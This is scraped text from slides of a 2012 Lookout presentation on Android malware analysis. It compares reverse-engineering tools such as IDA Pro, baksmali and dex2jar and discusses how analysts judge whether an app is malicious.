![Page 62: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/62.jpg)
Mobile Malware Analysis Tools
Lookout, Inc. Proprietary and Confidential Information
![Page 63: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/63.jpg)
Mobile Malware Analysis Tools
Lookout, Inc. Proprietary and Confidential Information
![Page 64: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/64.jpg)
Lookout, Inc. Proprietary and Confidential Information
![Page 65: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/65.jpg)
Different ways to tackle the problem
• Looking directly at DEX files
• Converting to a intermediate language
• Converting back to a higher level language (Java)
• Pro’s and Con’s for both
Lookout, Inc. Proprietary and Confidential Information
![Page 66: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/66.jpg)
Looking right at the op codes
• Like looking at dead listing of ASM
• Some nice templates for viewing (010 Editor)
• Liable to drive you insane
• Opcodes – http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
• +1 nerd skills
Lookout, Inc. Proprietary and Confidential Information
![Page 67: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/67.jpg)
Lookout, Inc. Proprietary and Confidential Information
![Page 68: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/68.jpg)
IDA Pro
• Reading dex at the “assembly level”
• Can also handle ELF ARM executable (native code)
• Most commonly used professional reversing tool
• Easily scriptable / Somewhat easily automated / Allows for SDK plugins
• Looks pretty
Lookout, Inc. Proprietary and Confidential Information
![Page 69: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/69.jpg)
Lookout, Inc. Proprietary and Confidential Information
![Page 70: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/70.jpg)
Lookout, Inc. Proprietary and Confidential Information
Decryption Script
![Page 71: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/71.jpg)
IDA Pro Pros & Cons
• + Endless uses, easy renaming, very stable
• + Best tool for ELF reversing available
• - Costs a ton (1.5k+)
• - Some functionality not supported for dex files (xref)
• - Hard to share work between reversers
• - Closed source
Lookout, Inc. Proprietary and Confidential Information
![Page 72: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/72.jpg)
(bak)smali
• Intermediate “jasmin” style language
• Most used tool
• Maintained by a (now) Google employee JesusFreke
• Open Source ( http://code.google.com/p/smali/ )
• Also recompilation!
Lookout, Inc. Proprietary and Confidential Information
![Page 73: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/73.jpg)
Lookout, Inc. Proprietary and Confidential Information
![Page 74: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/74.jpg)
baksmali Pros
• Easily readable code
• Highlighters available foremacs/vim/notepad++
• Open Source FTW!
• Recompilation
• Easy usage with apktool
• Extra output (debug/variable names)
Lookout, Inc. Proprietary and Confidential Information
![Page 75: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/75.jpg)
baksmali Cons
• Reading directly disassembled compiler code / can be hard to get used too
• No real IDE integration
• No GUI
Lookout, Inc. Proprietary and Confidential Information
![Page 76: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/76.jpg)
Dex2jar + ded + others
• Converts dex files to java class files (converting dex opcodes to java opcodes)
• Use java decompilation tools afterwards (jd-gui, jad, etc)
• Issue arrise, hard to solve the problem since dalvik is a register based vm where types don’t matter unlike the jvm
Lookout, Inc. Proprietary and Confidential Information
![Page 77: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/77.jpg)
Lookout, Inc. Proprietary and Confidential Information
![Page 78: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/78.jpg)
Dex2jar + ded + others Pros & Cons
• + Leverage Java tools on dalvik based code (iffy sometimes)
• - Prone to issues
• - Going from high level, to machine optimized back to high level loses context often (hard to reroll loops perfectly)
Lookout, Inc. Proprietary and Confidential Information
![Page 79: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/79.jpg)
Lookout, Inc. Proprietary and Confidential Information
Wat?
![Page 80: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/80.jpg)
Lookout, Inc. Proprietary and Confidential Information
![Page 81: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/81.jpg)
Ok – got the tools – now what?
• How do tell if something is bad?
• How do I tell what it’s doing and how?
Lookout, Inc. Proprietary and Confidential Information
![Page 82: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/82.jpg)
“Bad” is subjective
• “jailbreak”, “rooting” or “exploit” ?
• Did you tell me you’d root my device? (ex: zHash)
• Did you tell me you’d charge me money?
Lookout, Inc. Proprietary and Confidential Information
![Page 83: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/83.jpg)
“Bad” is subjective
• “jailbreak”, “rooting” or “exploit” ?
• Did you tell me you’d root my device? (ex: zHash)
• Did you tell me you’d charge me money?
Lookout, Inc. Proprietary and Confidential Information
![Page 84: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/84.jpg)
“Bad” is subjective
Lookout, Inc. Proprietary and Confidential Information
Are you trying to confuse the user?
Or are you just bad a UI?
Did you abort the SMS received telling
me I am being charged?
![Page 85: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/85.jpg)
Awesome!
• So you didn’t fall asleep?
• Interesting in reversing?
• But what can I reverse!
• http://contagiominidump.blogspot.com
Lookout, Inc. Proprietary and Confidential Information
![Page 86: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/86.jpg)
Now – in Java (magic happened to D.k())
Lookout, Inc. Proprietary and Confidential Information
![Page 87: Mobile Security Overview 23 April 2012. Agenda ‣ Mobile threat landscape ‣ Security/permissions model & the mythical sandbox ‣ Vulnerabilities ‣ Android.](https://reader036.fdocuments.net/reader036/viewer/2022062518/56649e835503460f94b84aa9/html5/thumbnails/87.jpg)
Thanks!
‣ [email protected]‣ [email protected]‣ [email protected]
Lookout, Inc. Proprietary and Confidential Information